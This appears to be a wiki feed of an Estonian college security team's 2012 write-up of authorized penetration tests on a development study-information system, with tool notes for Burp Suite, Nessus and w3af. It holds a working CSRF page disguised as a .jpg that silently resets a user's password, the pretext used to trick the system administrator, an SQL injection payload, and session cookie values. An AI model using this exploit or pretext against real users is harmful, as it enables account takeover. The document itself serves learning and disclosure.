&lt;br /&gt;
Katsetas koodi enda konto peal Taavi.&lt;br /&gt;
&lt;br /&gt;
=====2. katse - ÕIS&#039;i kasutaja parooli muutmine =====&lt;br /&gt;
&lt;br /&gt;
[[File:Salasona_ois.PNG|200px|thumb|right|Dev_OIS salasõna muutmisvorm]]&lt;br /&gt;
Otsustasime proovida, kas CSRF nõrkust annaks ära kasutada ka ÕISi administraatori pettes, kui saata talle pildi link, kus tegelikult taga jookseb HTML/JAVASCRIPT koos, mis saadab POST päringu salasõna muutmisega. Selle toimiseks oli eelduseks see, et rünnatav on ründamise hetkel juba dev-ÕISi sisselogitud.&lt;br /&gt;
&lt;br /&gt;
Selle jaoks uurisime välja, kus asub dev-ÕIS&#039;i kasutaja salasõna muutmise vorm ja kuhu saadetakse vormi sisu.&lt;br /&gt;
Vormilt võtsime lähtekoodist (Source Code) vastava koodi välja ja panime eraldi php faili.&lt;br /&gt;
&lt;br /&gt;
Muutsime password ja password_check lahtrite väärtused järgnevaks: &amp;quot;test123&amp;quot; ehk kasutaja uus parool peale rünnakut.&lt;br /&gt;
&lt;br /&gt;
Lahtrites muutsime user_id&#039;d sisaldavad väärtused rünnatava kasutaja user_id vastu, mille saab kätte tudengite/vilistlaste/õppejõudude piltide aadressidelt kätte.&lt;br /&gt;
&lt;br /&gt;
Kõik vormi lahtrite tüübid määrasime peidetud ehk &amp;quot;hidden&amp;quot;, et poleks midagi näidata. &lt;br /&gt;
&lt;br /&gt;
Kuna parooli muutmise formil on küljes ka continue parameeter, mis näitab seda, kuhu kasutaja viiakse peale parooli muutmist. &lt;br /&gt;
Selle muutsime väljalogimise lingiks, et peale POST päringu tegemist suunatakse kasutaja väljalogimise lehele.&lt;br /&gt;
Sellisel juhul ei tule ette teadet, et parooli just muudeti kuskil ja kasutaja enam ei saa oma vana parooliga sisse logida.&lt;br /&gt;
&lt;br /&gt;
Lisasime CSS koodi Submit nupu ära peitmiseks. &lt;br /&gt;
JavaScript koodi, et kui leht on laetud, siis automaatselt vajutataks seda nähtamatut Submit nuppu, et brauser saadaks HTML POST päringu ÕISi poole teele.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Salvestasime faili ära kui &amp;quot;screen1.jpg&amp;quot; fail. Ohver arvab, et tegu on pildiga, kui saadame lingi ja seda veel usaldusväärse aadressi pealt.&lt;br /&gt;
Tegelikult kasutaja ei näe praegu ühtegi pilti ja suunatakse edasi.&lt;br /&gt;
&lt;br /&gt;
Faili sisu:&lt;br /&gt;
&amp;lt;source lang=&amp;quot;html4strict&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;html&amp;gt;&lt;br /&gt;
 &amp;lt;head&amp;gt;&lt;br /&gt;
  &amp;lt;style type=&amp;quot;text/css&amp;quot;&amp;gt;&lt;br /&gt;
	  #Setpassword{ width: 0px; height: 0px; border: none; padding: 0; margin: 0; }&lt;br /&gt;
  &amp;lt;/style&amp;gt;&lt;br /&gt;
 &amp;lt;/head&amp;gt;&lt;br /&gt;
 &amp;lt;body&amp;gt;&lt;br /&gt;
  &amp;lt;body onload=&amp;quot;document.forms.setPasswordForm.submit();&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;form name=&amp;quot;setPasswordForm&amp;quot; id=&amp;quot;setPasswordForm&amp;quot; &lt;br /&gt;
  action=&amp;quot;https://itcollegedev.ois.ee/et/user/set-own-password?user_id=2227&amp;amp;amp;continue=/auth/logout&amp;quot;  &lt;br /&gt;
  method=&amp;quot;post&amp;quot;&amp;gt;&lt;br /&gt;
   &amp;lt;input type=&amp;quot;hidden&amp;quot; name=&amp;quot;user_id&amp;quot; value=&amp;quot;2227&amp;quot; id=&amp;quot;user_id&amp;quot; /&amp;gt;&lt;br /&gt;
   &amp;lt;input type=&amp;quot;hidden&amp;quot; name=&amp;quot;continue&amp;quot; value=&amp;quot;%2Fet%2Fsetting%3Fuser_id%3D2227&amp;quot; id=&amp;quot;continue&amp;quot; /&amp;gt;&lt;br /&gt;
   &amp;lt;input type=&amp;quot;hidden&amp;quot; name=&amp;quot;password&amp;quot; id=&amp;quot;password&amp;quot; value=&amp;quot;test123&amp;quot; /&amp;gt;&lt;br /&gt;
   &amp;lt;input type=&amp;quot;hidden&amp;quot; name=&amp;quot;password_check&amp;quot; id=&amp;quot;password_check&amp;quot; value=&amp;quot;test123&amp;quot; /&amp;gt;&lt;br /&gt;
   &amp;lt;input type=&amp;quot;submit&amp;quot; name=&amp;quot;Setpassword&amp;quot; id=&amp;quot;Setpassword&amp;quot; value=&amp;quot;Muuda salasõna&amp;quot; /&amp;gt;&lt;br /&gt;
  &amp;lt;/form&amp;gt;&lt;br /&gt;
 &amp;lt;/body&amp;gt;&lt;br /&gt;
&amp;lt;/html&amp;gt;&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
[[File:Admin_proof.PNG|200px|thumb|right|Ligisaadud adminpaneelile]]&lt;br /&gt;
&lt;br /&gt;
Tegime uue faili htaccess.txt, kuhu panime kirja käsu, mis käivitaks php ja jpg faile kui php failidena.&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
AddType application/x-httpd-php .php .jpg&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Laadisime mõlemad failid Enose veebiserverisse avalikult. &lt;br /&gt;
&lt;br /&gt;
Tegime enda kontode peal katsed, et kõik toimiks nii nagu vaja ja ega probleeme ei teki. &lt;br /&gt;
Peale seda juhendaja Mart Manguse abiga saime ÕISi adminnile Valter Kunglale väikese test-rünnaku teha.&lt;br /&gt;
Mart Mangus üritas seletada, et hinnetelehel on midagi viga ja palus, et Valter vaataks asja üle. &lt;br /&gt;
Sellega saavutasime selle, et Valter logis dev-ÕISi sisse oma kontoga.&lt;br /&gt;
Valter ütles, et ta ei näe midagi viltu ja selle peale saatsime talle nii nimetatud screenshoti, mille taga oli tegelt meie koodiga screen1.jpg fail. &lt;br /&gt;
Kui see fail käivitati, siis Valter Kungla parool muudeti ära ja logiti süsteemist välja. &lt;br /&gt;
Tol hetkel, täpselt ennem väljalogimist ja ümbersuunamist, muutus tema parool meie pantud &amp;quot;test123&amp;quot;-ks ja me saime ligipääsu administraatori õigustes kontole. &lt;br /&gt;
Rünnak oli edukas.&lt;br /&gt;
[[File:Pass fixed.PNG|200px|thumb|right|Dev_OIS fixed]]&lt;br /&gt;
&lt;br /&gt;
Andsime teada Valterile teada, et tegelikult tegime salajase ründe. &lt;br /&gt;
Suhteliselt koheselt oli Valteril see CSRF ründe vastu dev-ÕIS ära parandatud, kuna tal oli juba koodiparandus olemas aga lihtsalt rakendamata ja me tabasime ajaliselt viimase hetke ära, kus seda rünnet sai teha. &lt;br /&gt;
Peale parandust enam see rünne läbi ei läinud ja süsteem hõiskab vastu, et tegu on ründe või mõne bug&#039;iga.&lt;br /&gt;
&lt;br /&gt;
Kuna tegu oli ÕIS&#039;i arendusversiooniga, siis oli serveris oli lubatud ka error_reporting, mis annab välja ka pildil oleva errorite jada.&lt;br /&gt;
Error Reporting on maha keeratud Live keskkonnas ja seal sellist pikka keerulist koodijada veateadetega ette ei tule ning saadetakse teade arendajatele automaatselt.&lt;br /&gt;
&lt;br /&gt;
=== Taavi tegevus ===&lt;br /&gt;
===Burp suite===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Esimese asjane peale Burp suite käivitamist. Tabilt proxy  -&amp;gt;intercept -&amp;gt;intercept off&amp;lt;br&amp;gt;&lt;br /&gt;
Järgnevalt seadistada proxy enda veebiprauserist (mõistlik panna localhost aadress 127.0.0.1 port 8080 ning lülitada sisse ka ssl proxy)&amp;lt;br&amp;gt;&lt;br /&gt;
Proxy  -&amp;gt; options alt lülitada sisse proxy listner pordile 8080 .&amp;lt;br&amp;gt;&lt;br /&gt;
Ohvri valimine &amp;lt;br&amp;gt;&lt;br /&gt;
Valida intruder -&amp;gt; target ning sinna sisestada veebileht mida on plaanis uurida https lehe korral lülitada sisse ssl ning pordiks valida 443.&amp;lt;br&amp;gt;&lt;br /&gt;
Kui on tarvis lehte ka sisse logituna uurida siis tuleb seadistada järgmised parameetrid.&amp;lt;br&amp;gt;&lt;br /&gt;
Valida Options tab sealt sisse lülitada www authentication ning täita all olevad read.&amp;lt;br&amp;gt;site mida rünnatakse tema tüüp(üldiselt basic), login, parool ning valida add.&lt;br /&gt;
Kui on soov sooritada veebilehe sipderingi siis tuleb excludida ka logout käsud.&amp;lt;br&amp;gt;&lt;br /&gt;
Targer-&amp;gt;scope -&amp;gt; exclude  frome scope ja veenduda at välja on arvatud logout laused.&amp;lt;br&amp;gt;&lt;br /&gt;
Spideringi sisselülitamine &amp;lt;br&amp;gt;&lt;br /&gt;
Valida tab Spide ning sealt panna linnuke kasti spider running.&amp;lt;br&amp;gt;&lt;br /&gt;
Ning oledki valmis saama laheküljelt infot.&amp;lt;br&amp;gt;&lt;br /&gt;
Tööriistal on veel tohutu hulk seadistus võimalusi, aga kahjuks ajanappuse tõttu ei jõudnud nende kõikidega tutvuda.&amp;lt;br&amp;gt;&lt;br /&gt;
Tööriis ei ole mõeldud algajatele, kuid teda tundma õppides on võimailik sooritada keerukaid operatsioone. Suurim nõrkus sellel programmil on see, et ta otsing ei näita ära nõrkasid kohti veebilehel vaid need tuleb ise koodist ülesse otsida.&lt;br /&gt;
&lt;br /&gt;
==Nessuse algkäivitamine==&lt;br /&gt;
Valida backtrackist  vulnerability scannerite alt nessus ning edasi nessus register .&amp;lt;br&amp;gt; Täite ära vajalikud read veebilehel ning mailile saadetakse aktiveerimis kood.&amp;lt;br&amp;gt; Järgnevalt avada termnal ning sisestada käsk : /opt/nessus/bin/nessus –fetch –register **********(tärnide asemele meilile saadetud kood)&amp;lt;br&amp;gt;&lt;br /&gt;
Nüüd läheb aega kuni nessus updatedakse (ole valmis ootama võtab tükk aega.)&amp;lt;br&amp;gt;&lt;br /&gt;
Järgnevalt käivitada nessus user add ning sinna sisestada soovitav kasutajanimi nessusele, kui küsitakse kas admin konto siis sisestada y. Kõik on korras kui tuleb ette kiri user added.&amp;lt;br&amp;gt;&lt;br /&gt;
Järgnevalt valida nessus start.&amp;lt;br&amp;gt;&lt;br /&gt;
Et nessusesse siseneda veebibrauseri URL i kirjutada 127.0.0.1:8834 &lt;br /&gt;
Siis avaneb leht kus tuleb vajutada lehe alaosas olevale lingile mis suunab https leheküljele.&amp;lt;br&amp;gt;&lt;br /&gt;
Antud tööriist ei ole just kõige sobilikum veebilehtede testimiseks.&lt;br /&gt;
&lt;br /&gt;
=== Matise tegevus ===&lt;br /&gt;
==Väike upload tegevus, mis võiks olla teisiti==&lt;br /&gt;
Ajal mil on avatud stipendiumi taotlemine on võimalik uploadida üles dokumente, et anda lisainformatsiooni abitoetuse taotlemiseks.&lt;br /&gt;
Testimisel selgus, et hetkel üles on võimalik üles laadida ükskõik mis laiendiga faile.&lt;br /&gt;
Proovisime üles laadida: &lt;br /&gt;
&amp;lt;li&amp;gt;filme&lt;br /&gt;
&amp;lt;li&amp;gt;exe &lt;br /&gt;
&amp;lt;li&amp;gt;jpm faile &lt;br /&gt;
&amp;lt;br&amp;gt;kõik läks läbi ja sai uploadida.&lt;br /&gt;
&amp;lt;br&amp;gt;Sellises kohas võiks olla süsteem tehtud &amp;lt;b&amp;gt;whitelisti&amp;lt;/b&amp;gt; põhimõttel,&lt;br /&gt;
&amp;lt;br&amp;gt;et lubatud oleks ainult: &lt;br /&gt;
&amp;lt;li&amp;gt;.doc &lt;br /&gt;
&amp;lt;li&amp;gt;.docx &lt;br /&gt;
&amp;lt;li&amp;gt;.pdf &lt;br /&gt;
&amp;lt;br&amp;gt;Näiteks sellised failid ja kõik ülejäänud oleksid keelatud.&lt;br /&gt;
&lt;br /&gt;
=== Sanderi tegevus ===&lt;br /&gt;
[[File:W3af skanner.png|150px|thumb|w3af skänni seaded]]&lt;br /&gt;
Backtarcki keskkonnas sai testitud programmi w3af.&lt;br /&gt;
&lt;br /&gt;
==== Backtrack: w3af ====&lt;br /&gt;
[[File:Basic HTTP Auth.png|150px|thumb|w3af Basic HTTP Auth]]&lt;br /&gt;
[[File:ÕISi küpsis.png|150px|thumb|Mozilla Firefox küpsis]]&lt;br /&gt;
[[File:W3af_Cookie.png|150px|thumb|w3af Cookie]]&lt;br /&gt;
Võimalik kätte saada SSL Certificate.&lt;br /&gt;
Aadressiribalt leitud sisselogimis-aadressiga sisse logimine ei õnnestunud:&lt;br /&gt;
  https://itcollege.dev.ois.ee/auth/login?continue=/auth/login?&lt;br /&gt;
  username=&amp;lt;font color=&amp;quot;red&amp;quot;&amp;gt;KASUTAJANIMI&amp;lt;/font&amp;gt;&amp;amp;continue=&amp;amp;Login=Logi sisse&amp;amp;pw=&amp;lt;font color=&amp;quot;red&amp;quot;&amp;gt;PAROOL&amp;lt;/font&amp;gt;&lt;br /&gt;
Programmi sisestatud andmetega ka mitte:&lt;br /&gt;
  Configuration -&amp;gt; HTTP Config -&amp;gt; Basic HTTP Authentication:&lt;br /&gt;
    basicAuthUser: &amp;lt;font color=&amp;quot;red&amp;quot;&amp;gt;KASUTAJANIMI&amp;lt;/font&amp;gt;&lt;br /&gt;
    basicAuthPass: &amp;lt;font color=&amp;quot;red&amp;quot;&amp;gt;PAROOL&amp;lt;/font&amp;gt;&lt;br /&gt;
    basicAuthDomain: http://itcollege.dev.ois.ee&lt;br /&gt;
Mozilla Firefoxi küpsis õnnestus luua Töölauale hetkel sisse logitud sessiooni ID-ga. Programmi küpsise sisestamine:&lt;br /&gt;
  Configuration -&amp;gt; HTTP Config -&amp;gt; Cookies&lt;br /&gt;
    cookieJarFile: /root/Desktop/&amp;lt;font color=&amp;quot;red&amp;quot;&amp;gt;ois_cookie.txt&amp;lt;/font&amp;gt;&lt;br /&gt;
Seda loodud sessiooni ID-ga küpsist kasutada algul ei õnnestunud. Ilmselt oli midagi valesti. Õige on:&lt;br /&gt;
  # Netscape HTTP Cookie File&lt;br /&gt;
  .dev.ois.ee	TRUE	/	FALSE	1731510001	itcollege_OIS_SESSION_ID	&amp;lt;font color=&amp;quot;red&amp;quot;&amp;gt;870aqllryuw3cmf6cv8ellha03&amp;lt;/font&amp;gt;&lt;br /&gt;
Esimene rida on nõutav! Teiste tähendused:&lt;br /&gt;
  domain - The domain that created and that can read the variable.&lt;br /&gt;
  flag - A TRUE/FALSE value indicating if all machines within a given domain can access the variable.&lt;br /&gt;
    This value is set automatically by the browser, depending on the value you set for domain.&lt;br /&gt;
  path - The path within the domain that the variable is valid for.&lt;br /&gt;
  secure - A TRUE/FALSE value indicating if a secure connection with the domain is needed to access the variable.&lt;br /&gt;
  expiration - The UNIX time that the variable will expire on.&lt;br /&gt;
  name - The name of the variable.&lt;br /&gt;
  value - The value of the variable.&lt;br /&gt;
Küpsis on leitav Mozilla Firefoxis peale itcollege.dev.ois.ee-s oma kasutajaga sisse logimist:&lt;br /&gt;
  Edit -&amp;gt; Preferences -&amp;gt; Privacy -&amp;gt; History -&amp;gt; remove individual cookies&lt;br /&gt;
    Search: itcollege.dev.ois.ee&lt;br /&gt;
    Leitud valiku all Cookie Name: itcollege_OIS_SESSION_ID&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Skänneerimine:&lt;br /&gt;
&amp;lt;ul&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;The page language is: en&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;The URL: &amp;quot;https://itcollege.dev.ois.ee/&amp;quot; has a &amp;quot;&amp;lt;form&amp;gt;&amp;quot; element with auto-complete enabled.&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;A comment with the string &amp;quot;&amp;lt;p&amp;amp;gt;tunne end kui koolis&amp;lt;/p&amp;amp;gt;&amp;quot; was found in: &amp;quot;https://itcollege.dev.ois.ee/&amp;quot;.&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Found a form login. The action of the form is: &amp;quot;https://itcollege.dev.ois.ee/auth/login&amp;quot;.&amp;lt;/li&amp;gt;&lt;br /&gt;
  The username field to be used is: &amp;quot;username&amp;quot;.&lt;br /&gt;
  The password field to be used is: &amp;quot;pw&amp;quot;.&lt;br /&gt;
&amp;lt;li&amp;gt;&amp;lt;font color=&amp;quot;red&amp;quot;&amp;gt;Found authentication credentials to: &amp;quot;https://itcollege.dev.ois.ee/auth/login&amp;quot;. A correct user and password combination is: Administrador/6666666&amp;lt;/font&amp;gt;&amp;lt;/li&amp;gt;&lt;br /&gt;
  Antud kasutaja ja parooliga sisse ei saanud.&lt;br /&gt;
&amp;lt;li&amp;gt;The URL: &amp;quot;https://itcollege.dev.ois.ee/&amp;quot; returned a response that may contain a &amp;quot;SHA1&amp;quot; hash. The hash is: &amp;quot;c7b39896de5f296b5a44c2dfcd9f0600b2cf424d&amp;quot;. This is uncommon and requires human verification.&amp;lt;/li&amp;gt;&lt;br /&gt;
  Taolisi ja MD5 hashiga ridu leiti 355. Kõik vajavad inimese kontrolli.&lt;br /&gt;
&amp;lt;li&amp;gt;The URL: &amp;quot;https://itcollege.dev.ois.ee/&amp;quot; sent these cookies:&amp;lt;/li&amp;gt;&lt;br /&gt;
  itcollege_OIS_SESSION_ID=lm8llh4i3k2yj4d7rho6791u05; path=/&lt;br /&gt;
  itcollege_OIS_SESSION_ID=lm8llh4i3k2yj4d7rho6791u05; Path=/&lt;br /&gt;
&amp;lt;li&amp;gt;The SMTP settings in emailReport plugin seem to be incorrect. Original error: &amp;quot;[Errno 111] Connection refused&amp;quot;.&amp;lt;/li&amp;gt;&lt;br /&gt;
  Kui tuleb see veateade, siis skänn katkeb.&lt;br /&gt;
&amp;lt;li&amp;gt;&amp;lt;font color=&amp;quot;red&amp;quot;&amp;gt;The following scripts allow an attacker to send POST data as query string data (this makes XSRF easier to exploit):&amp;lt;/font&amp;gt;&amp;lt;/li&amp;gt;&lt;br /&gt;
  The URL: https://itcollege.dev.ois.ee/auth/openid-login is vulnerable to cross site request forgery.&lt;br /&gt;
    It allows the attacker to exchange the method from POST to GET when sending data to the server.&lt;br /&gt;
  The URL: https://itcollege.dev.ois.ee/auth/id-login is vulnerable to cross site request forgery.&lt;br /&gt;
    It allows the attacker to exchange the method from POST to GET when sending data to the server.&lt;br /&gt;
&amp;lt;li&amp;gt;&amp;lt;font color=&amp;quot;red&amp;quot;&amp;gt;SQL injection in a Unknown database was found at: &amp;quot;https://itcollege.dev.ois.ee/auth/login&amp;quot;, using HTTP method POST.&amp;lt;/font&amp;gt;&amp;lt;/li&amp;gt;&lt;br /&gt;
  The sent post-data was: &amp;quot;username=John8212&amp;amp;security_key_sis_global=d&#039;z&amp;quot;0&amp;amp;Login=Logi%20sisse&amp;amp;continue=56&amp;amp;pw=FrAmE30.&amp;quot;.&lt;br /&gt;
    The modified parameter was &amp;quot;security_key_sis_global&amp;quot;. This vulnerability was found in the request with id 390.&lt;br /&gt;
&amp;lt;li&amp;gt;Leidis ka otsirobotitele mõeldud faili: https://itcollege.dev.ois.ee/robots.txt&amp;lt;/li&amp;gt;&lt;br /&gt;
  User-agent: *&lt;br /&gt;
  Disallow: /&lt;br /&gt;
  Allow: /curriculum&lt;br /&gt;
  Allow: /subject&lt;br /&gt;
  Allow: /diploma&lt;br /&gt;
  Allow: /schedule/ical&lt;br /&gt;
&amp;lt;/ul&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== 4. päev - Presentatsiooni tegemine ja esitlemine ==&lt;br /&gt;
&lt;br /&gt;
Koostasime presentatsiooni ja esitlemine.&lt;br /&gt;
&lt;br /&gt;
[[Media:Security_team_presentation.ppt]]&lt;br /&gt;
&lt;br /&gt;
== Arvamused intensiivõppe nädala kohta ==&lt;br /&gt;
&lt;br /&gt;
== Tegijad ==&lt;br /&gt;
Alo Konno A21&lt;br /&gt;
&lt;br /&gt;
Urmo Lihten A21&lt;br /&gt;
&lt;br /&gt;
Taavi Podžuks A22&lt;br /&gt;
&lt;br /&gt;
Matis Alliksoo A22&lt;br /&gt;
&lt;br /&gt;
Sander Saarm A22&lt;br /&gt;
&lt;br /&gt;
== Juhendajad ==&lt;br /&gt;
Mart Mangus&lt;br /&gt;
&lt;br /&gt;
Margus Ernits&lt;br /&gt;
&lt;br /&gt;
Valter Kungla&lt;/div&gt;</summary>
		<author><name>Mallikso</name></author>
	</entry>
	<entry>
		<id>https://wiki.itcollege.ee/index.php?title=Security_team&amp;diff=47031</id>
		<title>Security team</title>
		<link rel="alternate" type="text/html" href="https://wiki.itcollege.ee/index.php?title=Security_team&amp;diff=47031"/>
		<updated>2012-03-30T11:32:25Z</updated>

		<summary type="html">&lt;p&gt;Mallikso: /* Väike upload tegevus, mis võiks olla teisiti */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== 1. päev - Materjalidega tutvumine ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h1&amp;gt;POOLELI!&amp;lt;/h1&amp;gt;&lt;br /&gt;
&lt;br /&gt;
https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project&lt;br /&gt;
&lt;br /&gt;
    A1: Injection - Urmo&lt;br /&gt;
    A2: Cross-Site Scripting (XSS) - Alo&lt;br /&gt;
    A3: Broken Authentication and Session Management - Sander&lt;br /&gt;
    A4: Insecure Direct Object References - Alo&lt;br /&gt;
    A5: Cross-Site Request Forgery (CSRF) - Taavi&lt;br /&gt;
    A6: Security Misconfiguration - Matis&lt;br /&gt;
    A7: Insecure Cryptographic Storage - Matis&lt;br /&gt;
    A8: Failure to Restrict URL Access - Urmo&lt;br /&gt;
    A9: Insufficient Transport Layer Protection - Taavi&lt;br /&gt;
    A10: Unvalidated Redirects and Forwards - Sander&lt;br /&gt;
&lt;br /&gt;
Sanderi konspekt: [[Media:Ois_materjal.pdf]] &amp;lt;br&amp;gt;&lt;br /&gt;
Urmo esitlus: [[Media:Injection-Failure_URL_access.ppt]] &amp;lt;br&amp;gt;&lt;br /&gt;
Taavi esitlus [[Meida: A9.pdf]] &amp;lt;br&amp;gt;&lt;br /&gt;
Taavi esitlus [[Meida: A5.pdf]] &amp;lt;br&amp;gt;&lt;br /&gt;
Alo Esitlus: [[Media:Cross-site_scripting_(XSS).ppt]] &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== 2. päev - Nõrkuste ja rünnete tundmaõppimine ja katsetamine==&lt;br /&gt;
===Security Team tegevusplaan===&lt;br /&gt;
1.	Päev&lt;br /&gt;
 1.1	Tutvuda OWASP’iga. &lt;br /&gt;
 1.2	Tutvuda OWASP’i aasta 2010 TOP 10 veebirakenduse turvariskidega.&lt;br /&gt;
 1.3	Iga grupiliige teeb 2 turvariski kohta väikese tutvustava ettekande.&lt;br /&gt;
2.	Päev&lt;br /&gt;
 2.1	Esitada tiimi tegevusplaan.&lt;br /&gt;
 2.2	Tutvuda turvariskidega natuke põhjalikumalt.&lt;br /&gt;
 2.3	Tutvuda ja katsetada erinevaid pen-testingu tööriistasid – BackTrack ja SamuraiCD võimalused.&lt;br /&gt;
 2.4	Täiendada esimese päeva ettekannet.&lt;br /&gt;
3.	Päev&lt;br /&gt;
 3.1	Alustada dev-ÕISi peal turvariskide leidmist – samuti iga grupi liige testib/katsetab 2 turvariski ekspluateerimist.&lt;br /&gt;
 3.2	Saadud tulemuste dokumenteerimine.&lt;br /&gt;
4.	Päev&lt;br /&gt;
 4.1	Saadud tulemuste esitlemine ettekandega&lt;br /&gt;
5.	Päev&lt;br /&gt;
 5.1	Tulemuste parandamine wiki’s.&lt;br /&gt;
&lt;br /&gt;
=== Alo tegevus ===&lt;br /&gt;
&lt;br /&gt;
http://www.acunetix.com/support/vulnerability-checks.htm&lt;br /&gt;
http://projects.webappsec.org/w/page/13246920/Cross%20Site%20Scripting&lt;br /&gt;
http://wiki.developerforce.com/page/Secure_Coding_Cross_Site_Scripting&lt;br /&gt;
http://www.youtube.com/watch?v=SG1cvGQ971g&lt;br /&gt;
http://www.isecom.org/research.html&lt;br /&gt;
http://evuln.com/tools/&lt;br /&gt;
http://sectools.org/tag/web-scanners/&lt;br /&gt;
http://www.webresourcesdepot.com/10-free-web-application-security-testing-tools/&lt;br /&gt;
http://www.acunetix.com/vulnerability-scanner/getting-started.htm&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Internetist sai otsitud parimat Windowsi automaatskännerit ja selleks osutus:&lt;br /&gt;
Acunetix Web Vulnerability Scanner v. 8&lt;br /&gt;
http://www.acunetix.com/vulnerability-scanner/&lt;br /&gt;
&lt;br /&gt;
Pärast programmi installimist tuli seadistada skännimine, valisime keskmie põhjalikkusega skänni.&lt;br /&gt;
Erinevalt teistest automaatskännidest sai sellel lihtsamalt seadistatud sisselogimine ja lisaks sai paika panna ka, et ta arvestaks välja Log out lingi.&lt;br /&gt;
Antud programm võimaldab skännida:&lt;br /&gt;
Cross-Site Scripting (XSS)&lt;br /&gt;
SQL Injection (blind test)&lt;br /&gt;
File inclusion&lt;br /&gt;
Code Execution&lt;br /&gt;
LDAP Injection&lt;br /&gt;
Cross Frame Scripting&lt;br /&gt;
SQL Injection (error msg. test)&lt;br /&gt;
CRLF Injection&lt;br /&gt;
Directory Travelsal&lt;br /&gt;
XPath Injection&lt;br /&gt;
URL Redirection&lt;br /&gt;
Application Error Message&lt;br /&gt;
&lt;br /&gt;
Kuna skänner skännib väga põhjalikult ja teskeskonnal ei töötanud täsvõimsusel oli ping väga suur ja skänn tegi vähe päringuid tunnis siis oleks täisskänni ajaliselt paar päeva.&lt;br /&gt;
&lt;br /&gt;
=== Urmo tegevus ===&lt;br /&gt;
&lt;br /&gt;
Kasutan BackTrack 5 R2 64bit Gnome ja Samurai CD 0.9.9 operatsioonisüsteeme katsetamaks ja uurimaks erinevate veebilehtede turvariskide ära kasutamist.&lt;br /&gt;
&lt;br /&gt;
Pandud tööle Samurai ja kasutatud Damm Vurnelable Web Application&#039;i.&lt;br /&gt;
&lt;br /&gt;
==== Brute Force (DVWA) ====&lt;br /&gt;
Käsitsi välja uuritud login andmed:&lt;br /&gt;
kasutajanimi: admin&lt;br /&gt;
parool: password&lt;br /&gt;
&lt;br /&gt;
===== Fireforce plugin Firefoxis =====&lt;br /&gt;
Tekitatud sai ka password list faili pass.txt.&lt;br /&gt;
&lt;br /&gt;
Kasutusel oli Firefox brauser, kuhu installisime plugin&#039;a Fireforce. &lt;br /&gt;
Siin kasutasime Youtube õpetust: http://youtu.be/lmgMXhM01fY .&lt;br /&gt;
&lt;br /&gt;
Panime kasutajanimeks &amp;quot;admin&amp;quot; ja paroolilahtris parema klõpsuga valisin Fireforce menüüst Library, ning laadisin talle pass.txt faili sisse.&lt;br /&gt;
Küsiti veel, et mis teksti veebilehelt peab otsima, kui sisselogimine on ebaõnnestunud. &lt;br /&gt;
Selleks sai sõna &amp;quot;incorrect&amp;quot;.&lt;br /&gt;
Määrata ära tuli ka, et mitu päringut sekundis tehakse. &lt;br /&gt;
Panime 10 aga kuna veebileht ei jõua sekundis nii palju ennast kuvada. &lt;br /&gt;
Päringute tegemise kiirus vähem kui 1 päring/sekundis.&lt;br /&gt;
&lt;br /&gt;
Töötavat tulemust me ei saanud, kuna õigest paroolist mindi üle pidevalt.&lt;br /&gt;
Kasutasime ka videos näidatud &amp;quot;@ DICTIONARY&amp;quot; teksti ühes lahtris ja siis plugin ei tahtnud üldse proovida ja lasi kõik katsed üle mingil põhjusel.&lt;br /&gt;
&lt;br /&gt;
Kuna me seda lahendust ei saanud tööle, siis sai proovitud ka BurpSuite programmi.&lt;br /&gt;
&lt;br /&gt;
===== Burpsuite v1.4 =====&lt;br /&gt;
Burpsuite v1.4 on Samurai WTF&#039;il olemas juba sees ja saab kohe käima panna.&lt;br /&gt;
[[File:Bp2naide.jpg|200px|thumb|right|BurpSuite näidis screenshot UI&#039;st]]&lt;br /&gt;
&lt;br /&gt;
Programm on juba loomult keerulisem. &lt;br /&gt;
Burpsuite&#039;iga tuleb panna käima proxy server localhost&#039;is ja brauser määrata kasutama seda proxy serverit aadressil 127.0.0.1:8080.&lt;br /&gt;
Kui ligipääs on rünnatavale lehele on olemas, siis teha prooviks üks väär sisselogimine. &lt;br /&gt;
Läbi proxy serveri tuleb BurpSuite&#039;ile kohale vastava veebilehe Header sisselogimise kohta.&lt;br /&gt;
Headeris tuleb payloadi positsioonid ära määrata, kuhu see hakkab nimekirja alusel igat sõna panema.&lt;br /&gt;
Payload&#039;i positsioonideks Headeris on username ja password lahtrid ning nendesse jätta ainult 2 paragrahvi tähemärki.&lt;br /&gt;
Ründe stiiliks määrata Pitchfork.&lt;br /&gt;
Mõlema payloadi positioni kohta tuleb ära määrata sõnade listid, mida programm hakkab kasutama.&lt;br /&gt;
Optioniste alt tuleb üle kontrollida ka sõnad, mida jälgitakse ebaõnnestunud sisselogimiste korral ja lubaksid järgmisi katseid.&lt;br /&gt;
Kui listid sai ära määratud, siis sai panna menüüst käsu Intruder -&amp;gt; Start Attack, mis siis alustas rünnet. &lt;br /&gt;
Kahjuks ka see rünne ei toiminud teadmata põhjusel. &lt;br /&gt;
Proovitud sai ka lühemate nimekirjadega ja edutult. &lt;br /&gt;
&lt;br /&gt;
Peale teise programmi kasutamist jõudsime järeldusele, et Brute Force ründest pole meil kasu ja ei aita eesmärki täita effektiivselt. &lt;br /&gt;
Dev-ÕISis on vastavad turvameetmed kasutusele võetud, mis takistab selle tegemist ehk avastamisel keelatakse 5-ks sisselogimine ära vastava teatega ja brute force programmidele ei tule vastavat sõna, mis tähendaks sisselogimise ebaõnnestumist ning annab valepositiivse.&lt;br /&gt;
&lt;br /&gt;
